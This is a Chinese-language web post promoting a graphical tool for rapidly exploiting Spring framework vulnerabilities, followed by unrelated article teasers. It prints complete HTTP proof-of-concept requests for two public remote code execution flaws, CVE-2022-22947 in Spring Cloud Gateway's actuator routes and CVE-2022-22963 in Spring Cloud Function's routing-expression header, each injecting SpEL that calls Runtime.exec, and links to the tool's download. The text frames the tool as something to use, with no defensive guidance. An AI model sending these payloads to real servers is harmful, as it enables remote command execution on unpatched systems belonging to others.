一款针对Spring漏洞框架进行快速利用的图形化工具

一款针对Spring漏洞框架进行快速利用的图形化工具

发布时间:2026/6/30 4:18:17

一款针对Spring漏洞框架进行快速利用的图形化工具
工具介绍Spring_All_Reachable一款针对Spring漏洞框架进行快速利用的图形化工具。工具使用Spring Cloud Gateway命令执行CVE-2022-22947漏洞描述Spring Cloud Gateway存在远程代码执行漏洞该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点其在启用、公开和不安全的情 况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。漏洞影响​ VMWare Spring Cloud GateWay 3.1.0​ VMWare Spring Cloud GateWay 3.0.03.0.6​ VMWare Spring Cloud GateWay ❤️.0.0漏洞pocPOST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 328 { id: hacktest, filters: [{ name: AddResponseHeader, args: {name: Result,value: #{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\id\}).getInputStream()))}} }], uri: http://example.com, order: 0 }POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: closePOST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0工具使用Spring Cloud Function SpEL 远程代码执行 (CVE-2022-22963)漏洞描述Spring Cloud Function 是Spring cloud中的serverless框架。Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理造成 Spel 表达式注入漏洞。攻击者可通过该漏洞执行任意代码。漏洞影响org.springframework.cloud:spring-cloud-function-context影响版本3.0.0.RELEASE~3.2.2漏洞pocPOST /functionRouter HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(touch /tmp/success) Content-Type: text/plain Content-Length: 4 test工具使用工具下载https://github.com/savior-only/Spring_All_Reachable/tree/main

相关新闻

Uvicorn、Gunicorn 傻傻分不清?FastAPI 生产部署避坑指南

Uvicorn、Gunicorn 傻傻分不清?FastAPI 生产部署避坑指南

没有过这种崩溃瞬间 —— 笔记本上 uvicorn main:app --reload 跑得行云流水,接口响应快到飞起。 结果兴冲冲部署到服务器,并发量刚一上来,请求就开始排队,然后 502、504 哗啦啦地来,用户群里瞬间炸锅。别问我怎么知道…

2026/6/30 4:18:17阅读更多 →
2026年怎么做微信商城小程序?

2026年怎么做微信商城小程序?

做微信商城小程序,很多商家第一反应是先找模板、做首页、上传商品。真正影响后续运营的,其实是商品怎么分类、库存怎么更新、支付怎么配置、会员怎么沉淀、活动怎么核算、售后怎么处理。商城小程序不是线上货架,而是一套交易和复购系统。 微…

2026/6/30 4:18:17阅读更多 →
第十章-人工智能的觉醒《改变世界的程序员》

第十章-人工智能的觉醒《改变世界的程序员》

第十章 人工智能的觉醒 — 从符号主义到深度学习的七十年长征 1956 年,一群平均年龄 28 岁的年轻人在达特茅斯学院聚会,他们相信"一个夏天"就能在人工智能领域取得重大突破。七十年后,这个"夏天"仍未结束,但人工智能已经改变了世界。这一章讲述的是一群…

2026/6/30 4:18:17阅读更多 →
基于大语言模型的智能蜜罐:动态交互与主动防御新范式

基于大语言模型的智能蜜罐:动态交互与主动防御新范式

1. 项目概述:当蜜罐遇上大语言模型在网络安全攻防的猫鼠游戏里,防守方常常处于被动。攻击者可以耐心地扫描、试探,而防御者必须时刻警惕,一个疏忽就可能被突破防线。传统的蜜罐技术,作为一种主动欺骗防御手段&#xff…

2026/6/30 5:08:20阅读更多 →
2026中小企业AI营销避坑指南:拒绝“伪需求”,只选“真提效”

2026中小企业AI营销避坑指南:拒绝“伪需求”,只选“真提效”

2024至2025年,是AI在营销领域狂飙突进的狂热期。然而,当时间来到2026年,市场已然进入冷静期。许多中小企业老板手里攥着一堆“智能工具”,却发现获客成本依然高企,人效并没有得到实质性提升。工具的“先进程度”与企业…

2026/6/30 5:08:20阅读更多 →
若依框架自定义功能测试实战:JMeter全链路性能压测指南

若依框架自定义功能测试实战:JMeter全链路性能压测指南

1. 项目概述:为什么需要测试若依的自定义功能?最近在带团队做项目,发现一个挺普遍的现象:很多Java开发者在学习若依这类开源框架时,花了不少时间写业务代码,但功能上线后,接口动不动就崩&#x…

2026/6/30 5:08:20阅读更多 →
分布式存储架构

分布式存储架构

分布式存储架构:数据时代的新型基石 在数据爆炸式增长的今天,传统集中式存储已难以满足海量数据的高效管理与访问需求。分布式存储架构应运而生,通过将数据分散存储在多个节点上,实现了高扩展性、高可靠性和高性能的完美结合。无…

2026/6/30 5:08:20阅读更多 →
企业公章备案为什么总是不通过?5个常见原因及解决建议

企业公章备案为什么总是不通过?5个常见原因及解决建议

企业完成注册后,通常需要办理公章刻制、公章备案、银行开户等一系列手续。其中,公章备案虽然属于基础流程,却也是很多企业容易遇到问题的环节。不少创业者反馈,备案资料已经提交,却迟迟没有审核通过;有的甚…

2026/6/30 5:08:20阅读更多 →
扫码点餐系统到底怎么收费?选错模式一年白干!

扫码点餐系统到底怎么收费?选错模式一年白干!

目录 一次性买断适合谁 按月订阅灵活省钱 按使用量收费更划算 考虑经营规模选模式 技术支持和升级服务 市场前景与数据驱动 一次性买断适合谁 一次性买断模式意味着你一次性付清系统费用,之后不再有月租。这种模式适合资金充足、计划长期使用系统的连锁餐饮品…

2026/6/30 5:03:20阅读更多 →
AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

AI Coding 六个月真实ROI账本:产品经理的血泪教训,研发的冷静忠告

6个月前的2025年12月,Boris Cherny 公开宣布自己卸载了 IDE。一时间,Vibe Coding 成了全行业最热的话题。6个月后,当我们回过头来拉一份真实账本,发现事情远没有"一句话生成一个App"那么浪漫。本文从产品经理和研发两个…

2026/6/30 4:03:30阅读更多 →
审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

审计来了,数据权限全开——审计走了,怎么确保权限全部关掉?

引言:审计结束三个月了,审计员的权限还没关某城商行每年按照监管要求开展至少一次数据安全审计。审计期间,内审部门需要抽样检查各类业务数据——交易流水、客户信息、员工操作日志、权限配置记录。这些数据分布在不同系统中,审计…

2026/6/30 4:36:27阅读更多 →
为什么你需要Destiny 2 Solo Enabler:技术原理与实战指南

为什么你需要Destiny 2 Solo Enabler:技术原理与实战指南

为什么你需要Destiny 2 Solo Enabler:技术原理与实战指南 【免费下载链接】Destiny-2-Solo-Enabler Repo containing the C# and XAML code for the D2SE program. Included is also the dependency for the program, and image asset. 项目地址: https://gitcode…

2026/6/30 0:02:58阅读更多 →
第六章:PowerPoint 2010 核心功能与实战应用 —— 从入门到精通

第六章:PowerPoint 2010 核心功能与实战应用 —— 从入门到精通

1. PowerPoint 2010基础操作全攻略 刚接触PowerPoint 2010时,很多人会被它复杂的界面吓到。其实只要掌握几个核心区域,就能快速上手。我最开始用PPT时,经常找不到功能按钮在哪,后来发现主要操作都集中在顶部功能区。 工作窗口主要…

2026/6/30 0:02:58阅读更多 →
XGBoost超参数实战:从理论到调优策略

XGBoost超参数实战:从理论到调优策略

1. XGBoost超参数基础认知 第一次接触XGBoost时,我被它那密密麻麻的参数列表吓到了。这感觉就像面对一架波音747的驾驶舱——每个按钮都可能有神奇的效果,但按错了就可能坠机。经过多年实战,我发现其实掌握十几个核心参数就能解决90%的问题。…

2026/6/30 0:02:59阅读更多 →